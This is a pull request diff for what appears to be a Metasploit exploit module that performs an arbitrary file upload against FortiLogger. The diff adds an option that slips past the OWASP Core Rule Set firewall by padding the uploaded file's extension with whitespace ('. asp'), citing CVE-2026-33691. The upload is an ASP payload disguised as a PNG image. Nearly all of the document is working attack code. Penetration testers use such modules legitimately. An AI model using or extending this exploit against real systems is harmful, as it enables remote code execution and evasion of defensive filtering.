### PR TITLE
Enhance FortiLogger exploit with CVE-2026-33691 bypass

### DIFF
--- a/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
+++ b/modules/exploits/windows/http/fortilogger_arbitrary_fileupload.rb
@@ -52,7 +52,8 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options(
       [
         Opt::RPORT(5000),
-        OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/'])
+        OptString.new('TARGETURI', [true, 'The base path to the FortiLogger', '/']),
+        OptBool.new('BYPASS_WITH_CVE_2026_33691', [false, 'Bypass OWASP CRS using whitespace padding (CVE-2026-33691)', false])
       ]
     )
   end
@@ -101,9 +102,15 @@ class MetasploitModule < Msf::Exploit::Remote
     print_good('Generate Payload')
     data = create_payload
 
+    filename = "#{rand_text_alphanumeric(rand(5..11))}.asp"
+    if datastore['BYPASS_WITH_CVE_2026_33691']
+      filename = filename.sub('.asp', '. asp')
+      print_status('Applying CVE-2026-33691 bypass (whitespace padding)...')
+    end
+
     boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(5..14))}"
     post_data = "--#{boundary}\r\n"
-    post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{rand_text_alphanumeric(rand(5..11))}.asp\"\r\n"
+    post_data << "Content-Disposition: form-data; name=\"file\"; filename=\"#{filename}\"\r\n"
     post_data << "Content-Type: image/png\r\n"
     post_data << "\r\n#{data}\r\n"
     post_data << "--#{boundary}\r\n"


### PR DESCRIPTION
Added option to bypass OWASP CRS using whitespace padding for CVE-2026-33691. Updated filename generation to use a random name for the uploaded file.
